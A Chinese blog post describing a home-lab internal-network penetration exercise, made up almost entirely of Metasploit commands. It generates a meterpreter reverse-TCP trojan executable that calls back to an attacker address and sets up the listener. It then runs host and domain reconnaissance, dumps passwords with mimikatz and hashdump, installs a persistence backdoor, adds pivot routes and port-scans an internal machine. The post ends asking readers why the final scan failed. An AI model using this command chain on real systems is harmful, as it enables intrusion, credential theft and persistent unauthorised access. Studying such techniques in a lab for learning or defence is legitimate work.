简单的内网渗透实验

孤街浪徒 提交于 2020-01-09 23:53:17

本机win10  192.168.1.109

虚拟机win7  NAT模式  192.168.1.131

攻击机:虚拟机kali  仅主机模式  192.168.10.128

 

假设攻击机kali已经对win10主机getshell

1.kali生成一个exe木马文件test.exe(这是最简单的木马文件,有杀软就会被杀,若要免杀还要做免杀处理)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.128 lport=4444 -f exe -o test.exe

将test.exe上传到win10主机上

2.msf下使用反弹连接

msfconsole

msf5 > use exploit/multi/handler

3.设置反弹需要的payload

msf5 > set payload windows/x64/meterpreter/reverse_tcp

4.查看配置选项

msf5 > show options

5.设置反弹回来的我们自己的主机IP和端口,开始监听4444端口

msf5 > set lhost 192.168.10.128

msf5 > set lport 4444

msf5 > run

6.目标主机打开木马程序文件payload.exe,得到反弹shell

meterpreter > 

7.域信息收集

meterpreter > getuid  #获得主机名

meterpreter > sysinfo  #获得系统信息

8.信息收集命令

run post/windows/gather/checkvm  #是否虚拟机(windows)

run post/linux/gather/checkvm  #是否虚拟机(linux)

run post/windows/gather/forensics/enum_drives  #查看分区

run post/windows/gather/enum_applications  #获取安装软件信息

run post/windows/gather/dumplinks  #获取最近的文件操作

run post/windows/gather/enum_ie  #获取IE缓存

run post/windows/gather/enum_chrome  #获取Chrome缓存

run post/windows/gather/enum_patches  #补丁信息

run post/windows/gather/enum_domain  #查找域控

9.获取密码

load mimikatz

kerberos

hashdump

10.权限维持

run persistence -i 10 -p 4444 -r 192.168.10.128

11.查看arp表与路由表

arp

route

12.添加路由

run autoroute -s 192.168.43.0/24(内网IP)

run autoroute -p

13.查询端口

background

use auxiliary/scanner/portscan/tcp

set RHOSTS 192.168.1.131

set PORTS 1-4000

set THREADS 50

run

 

这里有一个问题,我设置了路由转发,但是最后一步端口扫描却无法对win7进行扫描,run了以后就没反应了,一点提示信息都没有,如果有知道的大佬希望能评论指出,感激不尽

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!